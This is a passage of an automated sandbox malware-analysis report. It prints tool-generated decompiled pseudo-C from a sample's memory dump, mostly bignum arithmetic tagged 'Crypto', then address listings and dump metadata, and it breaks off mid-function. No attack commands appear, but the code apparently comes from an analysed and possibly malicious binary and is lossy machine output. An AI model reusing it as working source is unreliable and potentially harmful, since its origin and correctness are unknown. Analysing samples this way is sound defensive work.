																											__eflags = _t669 -  *((intOrPtr*)(_t718 - 8));
																											if(_t669 <=  *((intOrPtr*)(_t718 - 8))) {
																												break;
																											}
																											goto L157;
																										}
																										L162:
																										_t717 =  *(_t755 - 0x1c);
																										_t489 = E003D6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x18)), _t742);
																										 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
																										 *((intOrPtr*)( *( *(_t755 - 0x18)) + _t742 * 4)) = _t489;
																										_t491 = E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x18)),  *((intOrPtr*)(_t755 - 0x24)));
																										__eflags = _t491;
																										if(_t491 == 0) {
																											L165:
																											_t492 =  *(_t755 - 0x14);
																											goto L166;
																										}
																										 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
																										_t495 = E003D6FFC( *_t717,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t742);
																										__eflags = _t495;
																										if(_t495 == 0) {
																											goto L165;
																										}
																										_t492 =  *(_t755 - 0x14);
																										 *_t492 =  *_t492 + 1;
																										goto L166;
																									}
																									 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
																									goto L162;
																									L166:
																									_t665 =  *(_t755 - 0xc);
																									 *( *(_t755 - 0x3c) + _t492) =  *(_t755 - 0xc);
																									_t380 = _t755 - 0x30;
																									 *_t380 =  *(_t755 - 0x30) - 1;
																									__eflags =  *_t380;
																									 *(_t755 - 0x14) = _t492 - 4;
																								} while ( *_t380 != 0);
																								goto L167;
																							}
																						}
																					}
																				}
																				_t503 =  *((intOrPtr*)(_t741 + 4));
																				_t610 =  *(_t560 + 4);
																				__eflags = _t610 - _t503 + 1;
																				if(_t610 > _t503 + 1) {
																					_t719 = _t610 + 1;
																					__eflags = _t610 + 1 -  *((intOrPtr*)(_t560 + 8));
																					if(_t610 + 1 >  *((intOrPtr*)(_t560 + 8))) {
																						_t504 = E003D665B(_t719, _t560);
																					} else {
																						_t504 = _t560;
																					}
																					__eflags = _t504;
																					if(_t504 == 0) {
																						goto L179;
																					} else {
																						 *( *_t560 +  *(_t560 + 4) * 4) =  *( *_t560 +  *(_t560 + 4) * 4) & 0x00000000;
																						_t260 = _t560 + 4;
																						 *_t260 =  *(_t560 + 4) + 1;
																						__eflags =  *_t260;
																						goto L128;
																					}
																				}
																				_t720 = _t503 + 2;
																				__eflags = _t503 + 2 -  *((intOrPtr*)(_t560 + 8));
																				if(_t503 + 2 >  *((intOrPtr*)(_t560 + 8))) {
																					_t506 = E003D665B(_t720, _t560);
																					_t741 =  *(_t755 - 0x1c);
																				} else {
																					_t506 = _t560;
																				}
																				__eflags = _t506;
																				if(_t506 == 0) {
																					goto L179;
																				} else {
																					_t507 =  *(_t560 + 4);
																					while(1) {
																						__eflags = _t507 -  *((intOrPtr*)(_t741 + 4)) + 2;
																						if(_t507 >=  *((intOrPtr*)(_t741 + 4)) + 2) {
																							break;
																						}
																						 *( *_t560 + _t507 * 4) =  *( *_t560 + _t507 * 4) & 0x00000000;
																						_t507 = _t507 + 1;
																						__eflags = _t507;
																					}
																					 *(_t560 + 4) =  *((intOrPtr*)(_t741 + 4)) + 2;
																					goto L128;
																				}
																			}
																		} else {
																			if(E003D669B(_t573,  *((intOrPtr*)(_t755 - 8)),  *((intOrPtr*)(_t755 - 8))) == 0) {
																				goto L102;
																			}
																			L101:
																			 *(_t755 - 0x38) = 1;
																			goto L102;
																		}
																	}
																}
																if( *((intOrPtr*)( *_t573 + _t445 * 4 - 4)) == 0) {
																	goto L102;
																}
																_t573 =  *((intOrPtr*)(_t755 - 8));
																goto L94;
															}
														}
														_t517 =  *(_t755 - 4);
														_t618 =  *(_t517 + 4);
														__eflags = _t618 - _t658;
														if(_t618 <= _t658) {
															goto L85;
														}
														_t619 =  *_t517 + _t618 * 4 - 4;
														while(1) {
															_t751 =  *_t619;
															_t619 = _t619 - 4;
															__eflags = _t751;
															if(_t751 != 0) {
																goto L85;
															}
															 *(_t517 + 4) =  *(_t517 + 4) - 1;
															__eflags =  *(_t517 + 4) - _t658;
															if( *(_t517 + 4) > _t658) {
																continue;
															}
															goto L85;
														}
														goto L85;
													}
													_t518 =  *_t558 + _t437 * 4 - 4;
													while(1) {
														_t621 =  *_t518;
														_t518 = _t518 - 4;
														__eflags = _t621;
														if(_t621 != 0) {
															goto L80;
														}
														 *(_t558 + 4) =  *(_t558 + 4) - 1;
														__eflags =  *(_t558 + 4) - _t658;
														if( *(_t558 + 4) > _t658) {
															continue;
														}
														goto L80;
													}
													goto L80;
												} else {
													_t520 =  *(_t755 - 0xc) -  *(_t755 - 0x10);
													__eflags = _t520;
													 *(_t755 - 0x2c) = _t697;
													 *(_t755 - 0x44) = _t520;
													do {
														_t622 =  *(_t755 - 0x10);
														_t521 =  *_t622;
														_t721 =  *((intOrPtr*)(_t622 - 4));
														__eflags =  *_t622 -  *(_t755 - 0x18);
														if( *_t622 !=  *(_t755 - 0x18)) {
															_t522 = E003D6F02(_t521, _t721,  *(_t755 - 0x18));
															 *((intOrPtr*)(_t755 - 0x40)) = _t721 - _t522 *  *(_t755 - 0x18);
															 *(_t755 - 0xc) = _t522;
															_t523 =  *(_t755 - 0x28);
															_t677 = _t523 & 0x0000ffff;
															 *(_t755 - 0x30) = _t522 & 0x0000ffff;
															_t724 = _t522 >> 0x10;
															_t524 = _t523 >> 0x10;
															_t678 = _t677 *  *(_t755 - 0x30);
															 *(_t755 - 0x3c) = _t724;
															_t525 = _t524 *  *(_t755 - 0x3c);
															_t726 = _t524 *  *(_t755 - 0x30);
															_t630 = _t677 * _t724 + _t726;
															 *(_t755 - 0x30) = _t726;
															__eflags = _t630 - _t726;
															if(_t630 < _t726) {
																_t525 = _t525 + 0x10000;
																__eflags = _t525;
															}
															_t631 = _t630 << 0x10;
															_t679 = _t678 + _t631;
															_t526 = _t525 + (_t630 >> 0x10);
															__eflags = _t679 - _t631;
															if(_t679 < _t631) {
																_t526 = _t526 + 1;
																__eflags = _t526;
															}
															_t632 =  *((intOrPtr*)(_t755 - 0x40));
															while(1) {
																__eflags = _t526 - _t632;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags != 0) {
																	L66:
																	_t632 = _t632 +  *(_t755 - 0x18);
																	 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
																	__eflags = _t632 -  *(_t755 - 0x18);
																	if(_t632 <  *(_t755 - 0x18)) {
																		break;
																	}
																	__eflags = _t679 -  *(_t755 - 0x28);
																	if(_t679 <  *(_t755 - 0x28)) {
																		_t526 = _t526 - 1;
																		__eflags = _t526;
																	}
																	_t679 = _t679 -  *(_t755 - 0x28);
																	__eflags = _t679;
																	continue;
																}
																_t730 =  *(_t755 - 0x10);
																__eflags = _t679 -  *((intOrPtr*)(_t730 - 8));
																if(_t679 <=  *((intOrPtr*)(_t730 - 8))) {
																	break;
																}
																goto L66;
															}
															L71:
															_t729 =  *(_t755 - 0x1c);
															_t528 = E003D6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x20)), _t737);
															 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
															 *((intOrPtr*)( *( *(_t755 - 0x20)) + _t737 * 4)) = _t528;
															_t530 = E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x20)),  *(_t755 - 0x34));
															__eflags = _t530;
															if(_t530 == 0) {
																L74:
																_t531 =  *(_t755 - 0x10);
																goto L75;
															}
															 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
															_t534 = E003D6FFC( *_t729,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t737);
															__eflags = _t534;
															if(_t534 == 0) {
																goto L74;
															}
															_t531 =  *(_t755 - 0x10);
															 *_t531 =  *_t531 + 1;
															goto L75;
														}
														 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
														goto L71;
														L75:
														 *( *(_t755 - 0x44) + _t531) =  *(_t755 - 0xc);
														_t173 = _t755 - 0x2c;
														 *_t173 =  *(_t755 - 0x2c) - 1;
														__eflags =  *_t173;
														 *(_t755 - 0x10) = _t531 - 4;
													} while ( *_t173 != 0);
													goto L76;
												}
											}
										}
									}
									_t542 =  *((intOrPtr*)(_t736 + 4));
									_t643 =  *(_t558 + 4);
									__eflags = _t643 - _t542 + 1;
									if(_t643 > _t542 + 1) {
										_t732 = _t643 + 1;
										__eflags = _t643 + 1 -  *((intOrPtr*)(_t558 + 8));
										if(_t643 + 1 >  *((intOrPtr*)(_t558 + 8))) {
											_t543 = E003D665B(_t732, _t558);
										} else {
											_t543 = _t558;
										}
										__eflags = _t543;
										if(_t543 == 0) {
											goto L179;
										} else {
											 *( *_t558 +  *(_t558 + 4) * 4) =  *( *_t558 +  *(_t558 + 4) * 4) & 0x00000000;
											_t57 = _t558 + 4;
											 *_t57 =  *(_t558 + 4) + 1;
											__eflags =  *_t57;
											goto L38;
										}
									}
									_t733 = _t542 + 2;
									__eflags = _t542 + 2 -  *((intOrPtr*)(_t558 + 8));
									if(_t542 + 2 >  *((intOrPtr*)(_t558 + 8))) {
										_t545 = E003D665B(_t733, _t558);
										_t736 =  *(_t755 - 0x1c);
									} else {
										_t545 = _t558;
									}
									__eflags = _t545;
									if(_t545 == 0) {
										goto L179;
									} else {
										_t546 =  *(_t558 + 4);
										while(1) {
											__eflags = _t546 -  *((intOrPtr*)(_t736 + 4)) + 2;
											if(_t546 >=  *((intOrPtr*)(_t736 + 4)) + 2) {
												break;
											}
											 *( *_t558 + _t546 * 4) =  *( *_t558 + _t546 * 4) & 0x00000000;
											_t546 = _t546 + 1;
											__eflags = _t546;
										}
										 *(_t558 + 4) =  *((intOrPtr*)(_t736 + 4)) + 2;
										goto L38;
									}
								}
							}
							_t698 =  *(_t755 - 4);
							_t658 = _t755 - 0x60;
							if(E003D687A(_t698, _t755 - 0x60) >= 0) {
								goto L16;
							}
							E003D6732(_t698, 0);
							goto L86;
						}
					}
					if( *((intOrPtr*)( *_t562 + _t413 * 4 - 4)) == 0) {
						goto L102;
					}
					_t562 =  *(_t755 - 4);
					goto L9;
				}
			}



































































































































    0x003de04d
    0x003de04d
    0x003de052
    0x003de507
    0x003de50c
    0x003de516
    0x003de516
    0x003de060
    0x003de065
    0x003de06a
    0x00000000
    0x00000000
    0x003de070
    0x003de076
    0x003de081
    0x003de084
    0x003de078
    0x003de07a
    0x003de07a
    0x003de08b
    0x00000000
    0x003de091
    0x003de091
    0x003de094
    0x003de097
    0x003de09d
    0x003de0af
    0x003de0b3
    0x003de0bb
    0x003de0bb
    0x003de0c6
    0x00000000
    0x003de0cc
    0x003de0d0
    0x003de0f1
    0x003de0f1
    0x003de0f4
    0x003de100
    0x003de10a
    0x003de10e
    0x003de113
    0x003de117
    0x003de119
    0x003de11c
    0x003de8d3
    0x003de8d6
    0x00000000
    0x003de8d6
    0x003de122
    0x003de124
    0x00000000
    0x00000000
    0x003de12a
    0x003de12c
    0x00000000
    0x00000000
    0x003de132
    0x003de13a
    0x003de13a
    0x003de13f
    0x003de145
    0x003de145
    0x003de145
    0x003de148
    0x003de149
    0x003de151
    0x003de156
    0x003de159
    0x003de15b
    0x00000000
    0x003de161
    0x003de161
    0x003de16d
    0x003de172
    0x003de175
    0x003de177
    0x00000000
    0x00000000
    0x003de17d
    0x003de181
    0x003de185
    0x003de1fa
    0x003de1fa
    0x003de1fd
    0x003de203
    0x003de205
    0x003de207
    0x003de20b
    0x003de210
    0x003de218
    0x003de221
    0x003de228
    0x003de22b
    0x003de22e
    0x003de231
    0x003de234
    0x003de237
    0x003de243
    0x003de239
    0x003de239
    0x003de239
    0x003de250
    0x003de253
    0x003de256
    0x003de259
    0x003de25c
    0x003de25f
    0x003de265
    0x003de26a
    0x003de26d
    0x003de26d
    0x003de270
    0x003de272
    0x00000000
    0x003de278
    0x003de278
    0x003de280
    0x003de285
    0x003de28c
    0x003de28f
    0x003de292
    0x003de295
    0x003de298
    0x003de2a3
    0x003de2a8
    0x003de2ab
    0x003de29a
    0x003de29a
    0x003de29a
    0x003de2ae
    0x003de2b0
    0x00000000
    0x003de2b6
    0x003de2b6
    0x003de2ba
    0x003de2c2
    0x003de2c7
    0x003de2c9
    0x003de2e7
    0x003de2ea
    0x003de2ea
    0x003de2ea
    0x003de2cb
    0x003de2d6
    0x003de2df
    0x003de2df
    0x003de2c9
    0x003de2ed
    0x003de2f0
    0x003de2f4
    0x003de2fc
    0x003de2fc
    0x003de2fc
    0x003de2f6
    0x003de2f6
    0x003de2f6
    0x003de300
    0x003de301
    0x003de303
    0x003de41f
    0x003de41f
    0x003de422
    0x003de424
    0x003de426
    0x003de43f
    0x003de43f
    0x003de442
    0x003de465
    0x003de468
    0x003de46d
    0x003de470
    0x003de473
    0x003de477
    0x003de47f
    0x003de47f
    0x003de479
    0x003de47b
    0x003de47b
    0x003de481
    0x003de485
    0x003de48d
    0x003de494
    0x003de496
    0x00000000
    0x003de4a6
    0x003de4a6
    0x003de4a9
    0x003de4ac
    0x003de4b1
    0x003de4be
    0x003de4c2
    0x003de4cd
    0x003de4cd
    0x003de4d4
    0x003de4da
    0x00000000
    0x003de4dc
    0x003de4df
    0x003de517
    0x003de51a
    0x003de526
    0x003de530
    0x003de539
    0x003de53d
    0x003de540
    0x003de545
    0x003de549
    0x003de54c
    0x00000000
    0x00000000
    0x003de552
    0x003de554
    0x00000000
    0x00000000
    0x003de55a
    0x003de55c
    0x00000000
    0x00000000
    0x003de562
    0x003de564
    0x00000000
    0x00000000
    0x003de56a
    0x003de572
    0x003de572
    0x003de577
    0x003de57d
    0x003de57d
    0x003de57d
    0x003de580
    0x003de581
    0x003de586
    0x003de58e
    0x003de590
    0x00000000
    0x003de596
    0x003de596
    0x003de5a1
    0x003de5a5
    0x003de5ad
    0x003de5af
    0x00000000
    0x00000000
    0x003de5b5
    0x003de5b9
    0x003de5bd
    0x003de632
    0x003de632
    0x003de635
    0x003de63b
    0x003de63d
    0x003de63f
    0x003de643
    0x003de648
    0x003de650
    0x003de659
    0x003de65c
    0x003de660
    0x003de663
    0x003de666
    0x003de669
    0x003de66c
    0x003de66f
    0x003de67b
    0x003de671
    0x003de671
    0x003de671
    0x003de688
    0x003de694
    0x003de697
    0x003de69a
    0x003de69d
    0x003de6a0
    0x003de6ab
    0x003de6b0
    0x003de6b3
    0x003de6a2
    0x003de6a2
    0x003de6a2
    0x003de6b6
    0x003de6b8
    0x00000000
    0x003de6be
    0x003de6be
    0x003de6c6
    0x003de6cb
    0x003de6d2
    0x003de6d5
    0x003de6d8
    0x003de6db
    0x003de6de
    0x003de6ea
    0x003de6ef
    0x003de6f2
    0x003de6e0
    0x003de6e0
    0x003de6e0
    0x003de6f5
    0x003de6f7
    0x00000000
    0x003de6fd
    0x003de6fd
    0x003de701
    0x003de703
    0x003de709
    0x003de70e
    0x003de710
    0x003de72e
    0x003de731
    0x003de731
    0x003de731
    0x003de712
    0x003de715
    0x003de71d
    0x003de726
    0x003de726
    0x003de710
    0x003de734
    0x003de737
    0x003de73b
    0x003de743
    0x003de743
    0x003de743
    0x003de73d
    0x003de73d
    0x003de73d
    0x003de747
    0x003de748
    0x003de74a
    0x003de866
    0x003de866
    0x003de869
    0x003de86b
    0x003de884
    0x003de884
    0x003de88a
    0x003de890
    0x003de898
    0x003de89b
    0x003de89d
    0x003de89d
    0x003de8a0
    0x003de8a3
    0x003de8c6
    0x003de8c9
    0x00000000
    0x003de8c9
    0x003de8a5
    0x003de8a8
    0x003de8ab
    0x003de8ad
    0x00000000
    0x00000000
    0x003de8b1
    0x003de8b5
    0x003de8b5
    0x003de8b7
    0x003de8ba
    0x003de8bc
    0x00000000
    0x00000000
    0x003de8be
    0x003de8c1
    0x003de8c4
    0x00000000
    0x00000000
    0x00000000
    0x003de8c4
    0x00000000
    0x003de8b5
    0x003de86f
    0x003de873
    0x003de873
    0x003de875
    0x003de878
    0x003de87a
    0x00000000
    0x00000000
    0x003de87c
    0x003de87f
    0x003de882
    0x00000000
    0x00000000
    0x00000000
    0x003de882
    0x00000000
    0x003de750
    0x003de753
    0x003de753
    0x003de756
    0x003de759
    0x003de75c
    0x003de75c
    0x003de75f
    0x003de761
    0x003de764
    0x003de767
    0x003de776
    0x003de785
    0x003de78d
    0x003de790
    0x003de793
    0x003de796
    0x003de799
    0x003de79c
    0x003de7a1
    0x003de7a8
    0x003de7ad
    0x003de7b1
    0x003de7b5
    0x003de7b7
    0x003de7ba
    0x003de7bc
    0x003de7be
    0x003de7be
    0x003de7be
    0x003de7c5
    0x003de7cb
    0x003de7cd
    0x003de7cf
    0x003de7d1
    0x003de7d3
    0x003de7d3
    0x003de7d3
    0x003de7d4
    0x003de7f7
    0x003de7f7
    0x003de7f9
    0x00000000
    0x00000000
    0x003de7d9
    0x003de7e3
    0x003de7e3
    0x003de7e6
    0x003de7e9
    0x003de7ec
    0x00000000
    0x00000000
    0x003de7ee
    0x003de7f1
    0x003de7f3
    0x003de7f3
    0x003de7f3
    0x003de7f4
    0x003de7f4
    0x00000000
    0x003de7f4
    0x003de7db
    0x003de7de
    0x003de7e1
    0x00000000
    0x00000000
    0x00000000
    0x003de7e1
    0x003de7fb
    0x003de7fb
    0x003de809
    0x003de813
    0x003de81a
    0x003de824
    0x003de82b
    0x003de82d
    0x003de84b
    0x003de84b
    0x00000000
    0x003de84b
    0x003de834
    0x003de83a
    0x003de840
    0x003de842
    0x00000000
    0x00000000
    0x003de844
    0x003de847
    0x00000000
    0x003de847
    0x003de769
    0x00000000
    0x003de84e
    0x003de851
    0x003de854
    0x003de85a
    0x003de85a
    0x003de85a
    0x003de85d
    0x003de85d
    0x00000000
    0x003de75c
    0x003de74a
    0x003de6f7
    0x003de6b8
    0x003de5bf
    0x003de5c2
    0x003de5c8
    0x003de5ca
    0x003de60b
    0x003de60e
    0x003de611
    0x003de619
    0x003de613
    0x003de613
    0x003de613
    0x003de61e
    0x003de620
    0x00000000
    0x003de626
    0x003de62b
    0x003de62f
    0x003de62f
    0x003de62f
    0x00000000
    0x003de62f
    0x003de620
    0x003de5cc
    0x003de5cf
    0x003de5d2
    0x003de5da
    0x003de5df
    0x003de5d4
    0x003de5d4
    0x003de5d4
    0x003de5e2
    0x003de5e4
    0x00000000
    0x003de5ea
    0x003de5ea
    0x003de5f6
    0x003de5fc
    0x003de5fe
    0x00000000
    0x00000000
    0x003de5f1
    0x003de5f5
    0x003de5f5
    0x003de5f5
    0x003de606
    0x00000000
    0x003de606
    0x003de5e4
    0x003de4ef
    0x003de4fe
    0x00000000
    0x00000000
    0x003de500
    0x003de500
    0x00000000
    0x003de500
    0x003de4df
    0x003de4da
    0x003de4b9
    0x00000000
    0x00000000
    0x003de4bb
    0x00000000
    0x003de4bb
    0x003de496
    0x003de444
    0x003de447
    0x003de44a
    0x003de44c
    0x00000000
    0x00000000
    0x003de450
    0x003de454
    0x003de454
    0x003de456
    0x003de459
    0x003de45b
    0x00000000
    0x00000000
    0x003de45d
    0x003de460
    0x003de463
    0x00000000
    0x00000000
    0x00000000
    0x003de463
    0x00000000
    0x003de454
    0x003de42a
    0x003de42e
    0x003de42e
    0x003de430
    0x003de433
    0x003de435
    0x00000000
    0x00000000
    0x003de437
    0x003de43a
    0x003de43d
    0x00000000
    0x00000000
    0x00000000
    0x003de43d
    0x00000000
    0x003de309
    0x003de30c
    0x003de30c
    0x003de30f
    0x003de312
    0x003de315
    0x003de315
    0x003de318
    0x003de31a
    0x003de31d
    0x003de320
    0x003de32f
    0x003de33e
    0x003de346
    0x003de349
    0x003de34c
    0x003de34f
    0x003de352
    0x003de355
    0x003de35a
    0x003de361
    0x003de366
    0x003de36a
    0x003de36e
    0x003de370
    0x003de373
    0x003de375
    0x003de377
    0x003de377
    0x003de377
    0x003de37e
    0x003de384
    0x003de386
    0x003de388
    0x003de38a
    0x003de38c
    0x003de38c
    0x003de38c
    0x003de38d
    0x003de3b0
    0x003de3b0
    0x003de3b2
    0x00000000
    0x00000000
    0x003de392
    0x003de39c
    0x003de39c
    0x003de39f
    0x003de3a2
    0x003de3a5
    0x00000000
    0x00000000
    0x003de3a7
    0x003de3aa
    0x003de3ac
    0x003de3ac
    0x003de3ac
    0x003de3ad
    0x003de3ad
    0x00000000
    0x003de3ad
    0x003de394
    0x003de397
    0x003de39a
    0x00000000
    0x00000000
    0x00000000
    0x003de39a
    0x003de3b4
    0x003de3b4
    0x003de3c2
    0x003de3cc
    0x003de3d3
    0x003de3dd
    0x003de3e4
    0x003de3e6
    0x003de404
    0x003de404
    0x00000000
    0x003de404
    0x003de3ed
    0x003de3f3
    0x003de3f9
    0x003de3fb
    0x00000000
    0x00000000
    0x003de3fd
    0x003de400
    0x00000000
    0x003de400
    0x003de322
    0x00000000
    0x003de407
    0x003de40d
    0x003de413
    0x003de413
    0x003de413
    0x003de416
    0x003de416
    0x00000000
    0x003de315
    0x003de303
    0x003de2b0
    0x003de272
    0x003de187
    0x003de18a
    0x003de190
    0x003de192
    0x003de1d3
    0x003de1d6
    0x003de1d9
    0x003de1e1
    0x003de1db
    0x003de1db
    0x003de1db
    0x003de1e6
    0x003de1e8
    0x00000000
    0x003de1ee
    0x003de1f3
    0x003de1f7
    0x003de1f7
    0x003de1f7
    0x00000000
    0x003de1f7
    0x003de1e8
    0x003de194
    0x003de197
    0x003de19a
    0x003de1a2
    0x003de1a7
    0x003de19c
    0x003de19c
    0x003de19c
    0x003de1aa
    0x003de1ac
    0x00000000
    0x003de1b2
    0x003de1b2
    0x003de1be
    0x003de1c4
    0x003de1c6
    0x00000000
    0x00000000
    0x003de1b9
    0x003de1bd
    0x003de1bd
    0x003de1bd
    0x003de1ce
    0x00000000
    0x003de1ce
    0x003de1ac
    0x003de15b
    0x003de0d2
    0x003de0d5
    0x003de0e1
    0x00000000
    0x00000000
    0x003de0e7
    0x00000000
    0x003de0e7
    0x003de0c6
    0x003de0a6
    0x00000000
    0x00000000
    0x003de0ac
    0x00000000
    0x003de0ac

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D9885, Relevance: .6, Instructions: 641Crypto
    C-Code - Quality: 100%
    			E003D9885(void* __eax, void* __ecx, void* __esi) {
				void* _t331;
				unsigned int _t332;
				signed int _t333;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				signed int _t343;
				void* _t345;
				void* _t346;
				void* _t347;
				signed int _t348;
				void* _t350;
				void* _t351;
				void* _t352;
				signed int _t353;
				signed int _t354;
				void* _t356;
				signed int _t358;
				void* _t360;
				signed int _t362;
				signed int _t363;
				void* _t364;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t370;
				signed int _t371;
				void* _t372;
				signed int _t375;
				signed int _t376;
				void* _t377;
				signed int _t379;
				signed int _t380;
				void* _t381;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed int _t387;
				void* _t389;
				signed int _t391;
				signed int _t392;
				void* _t393;
				signed int _t395;
				signed int _t396;
				void* _t397;
				signed int _t400;
				signed int _t401;
				void* _t402;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed int _t408;
				void* _t410;
				signed int _t412;
				signed int _t413;
				void* _t414;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				void* _t422;
				void* _t424;
				intOrPtr _t426;
				unsigned int _t427;
				signed int _t428;
				void* _t430;
				unsigned int _t433;
				signed int _t434;
				void* _t435;
				unsigned int _t438;
				signed int _t439;
				void* _t440;
				unsigned int _t443;
				signed int _t444;
				void* _t445;
				intOrPtr _t447;
				unsigned int _t450;
				signed int _t451;
				void* _t452;
				unsigned int _t455;
				signed int _t456;
				void* _t457;
				unsigned int _t460;
				signed int _t461;
				void* _t462;
				intOrPtr _t464;
				unsigned int _t465;
				signed int _t466;
				void* _t468;
				unsigned int _t471;
				signed int _t472;
				void* _t473;
				unsigned int _t476;
				signed int _t477;
				void* _t478;
				intOrPtr _t480;
				unsigned int _t483;
				signed int _t484;
				void* _t485;
				unsigned int _t488;
				signed int _t489;
				void* _t490;
				intOrPtr _t492;
				unsigned int _t493;
				signed int _t494;
				void* _t496;
				unsigned int _t499;
				signed int _t500;
				void* _t501;
				intOrPtr _t503;
				unsigned int _t506;
				signed int _t507;
				signed int _t508;
				intOrPtr _t510;
				signed int _t512;
				signed int _t513;
				signed int _t516;
				signed int _t518;
				signed int _t521;
				signed int _t523;
				signed int _t526;
				signed int _t528;
				signed int _t531;
				signed int _t533;
				signed int _t536;
				signed int _t538;
				signed int _t541;
				signed int _t543;
				signed int _t548;
				signed int _t550;
				signed int _t553;
				signed int _t555;
				signed int _t558;
				signed int _t560;
				signed int _t563;
				signed int _t565;
				signed int _t570;
				signed int _t572;
				signed int _t575;
				signed int _t577;
				void* _t581;
				void* _t582;
				intOrPtr _t583;
				void* _t585;
				unsigned int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				void* _t591;
				signed int _t592;
				signed int _t593;
				void* _t594;
				signed int _t595;
				signed int _t596;
				void* _t597;
				signed int _t598;
				signed int _t599;
				void* _t600;
				signed int _t601;
				signed int _t602;
				void* _t603;
				signed int _t604;
				signed int _t605;
				void* _t606;
				unsigned int _t608;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				void* _t612;
				signed int _t613;
				signed int _t614;
				void* _t615;
				signed int _t616;
				signed int _t617;
				void* _t618;
				signed int _t619;
				signed int _t620;
				void* _t621;
				unsigned int _t623;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				void* _t627;
				signed int _t628;
				signed int _t629;
				void* _t630;
				signed int _t631;
				void* _t633;

				_t585 = __esi;
				_t356 = __ecx;
				_t331 = __eax;
				_t424 = __ecx;
				if( *(_t633 - 4) < __esi) {
					_t424 = __ecx + 1;
				}
				_t340 =  *(_t633 - 0xc) + _t424;
				if(_t340 < _t424) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				_t426 =  *(_t633 - 4) + _t585;
				if(_t426 < _t585) {
					_t356 = _t356 + 1;
				}
				_t341 = _t340 + _t356;
				if(_t341 < _t356) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x1c)) = _t426;
				_t427 =  *(_t331 + 0x10);
				_t358 = _t427 & 0x0000ffff;
				_t428 = _t427 >> 0x10;
				_t587 = _t358 * _t428;
				_t588 = _t587 << 0x11;
				_t360 = _t358 * _t358 + _t588;
				_t430 = _t428 * _t428 + (_t587 >> 0xf);
				if(_t360 < _t588) {
					_t430 = _t430 + 1;
				}
				_t342 = _t341 + _t360;
				if(_t342 < _t360) {
					_t430 = _t430 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t430;
				if( *(_t633 - 8) < _t430) {
					 *(_t633 - 4) = 1;
				}
				_t516 =  *(_t331 + 0xc) & 0x0000ffff;
				_t589 =  *(_t331 + 0x14) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
				_t362 =  *(_t331 + 0x16) & 0x0000ffff;
				_t590 = _t589 * _t516;
				 *(_t633 - 0x14) = _t516;
				_t363 = _t362 *  *(_t633 - 0x10);
				_t518 = _t362 *  *(_t633 - 0x14);
				_t433 = _t589 *  *(_t633 - 0x10) + _t518;
				if(_t433 < _t518) {
					_t363 = _t363 + 0x10000;
				}
				_t434 = _t433 << 0x10;
				_t591 = _t590 + _t434;
				_t364 = _t363 + (_t433 >> 0x10);
				if(_t591 < _t434) {
					_t364 = _t364 + 1;
				}
				_t343 = _t342 + _t591;
				_t435 = _t364;
				 *(_t633 - 0xc) = _t343;
				if(_t343 < _t591) {
					_t435 = _t364 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t435;
				if( *(_t633 - 8) < _t435) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t591;
				if( *(_t633 - 0xc) < _t591) {
					_t364 = _t364 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t364;
				if( *(_t633 - 8) < _t364) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t521 =  *(_t331 + 8) & 0x0000ffff;
				_t592 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
				_t366 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t593 = _t592 * _t521;
				 *(_t633 - 0x14) = _t521;
				_t367 = _t366 *  *(_t633 - 0x10);
				_t523 = _t366 *  *(_t633 - 0x14);
				_t438 = _t592 *  *(_t633 - 0x10) + _t523;
				if(_t438 < _t523) {
					_t367 = _t367 + 0x10000;
				}
				_t439 = _t438 << 0x10;
				_t594 = _t593 + _t439;
				_t368 = _t367 + (_t438 >> 0x10);
				if(_t594 < _t439) {
					_t368 = _t368 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
				_t440 = _t368;
				if( *(_t633 - 0xc) < _t594) {
